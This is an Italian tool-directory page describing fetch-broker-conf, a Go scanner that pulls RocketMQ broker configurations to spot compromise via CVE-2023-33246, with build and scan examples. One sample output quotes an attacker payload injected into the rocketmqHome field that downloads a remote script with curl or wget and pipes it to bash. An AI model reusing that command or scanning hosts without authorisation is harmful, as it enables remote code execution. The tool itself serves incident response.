Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
fetch-broker-conf — Un exploit in Go per il recupero della configurazione del broker RocketMQ al fine di scoprire indicatori di compromissione per CVE-2023-33246 | Kitploit
Strumenti/GitHubGitHub/vulncheck-oss/fetch-broker-conf
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingRisposta agli Incidenti
GitHubvulncheck-oss/fetch-broker-conf

fetch-broker-conf

Un exploit in Go per il recupero della configurazione del broker RocketMQ al fine di scoprire indicatori di compromissione per CVE-2023-33246

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi RepositorySito web
5151 anno faNon ancora revisionato
Condividi

Recupera Configurazione Broker

Recupera Configurazione Broker tenterà di scaricare la configurazione del broker RocketMQ per cercare indicatori di compromissione nella variabile rocketmqHome. La variabile è utilizzata da vari attaccanti per eseguire codice tramite CVE-2023-33246. Per ulteriori dettagli, consulta il blog di VulnCheck.

Compilazione

Puoi usare il makefile per creare un container docker:

root@kitploit:~
make docker

Oppure, se hai un ambiente di build Go pronto, usa semplicemente make:

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

Utilizzo

Lo strumento è costruito su go-exploit, quindi ci sono molti modi per fornire i target da scansionare. Una descrizione completa si trova nella documentazione di scansione del progetto. Tuttavia, di seguito sono mostrati alcuni esempi:

Scansione di un singolo host

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

Scansione di più host

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

Scansione di un file di host tramite proxy

go-exploit fornisce la possibilità di scansionare tramite un csv di target fornito, dove il csv è: host, port, anything if ssl is enabled (sebbene il campo SSL venga ignorato se si utilizza -a). Fornisce anche la possibilità di scansionare tramite un proxy. Il comando funziona così (nota che -a è il rilevamento automatico SSL):

root@kitploit:~
albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}
Scarica lo strumento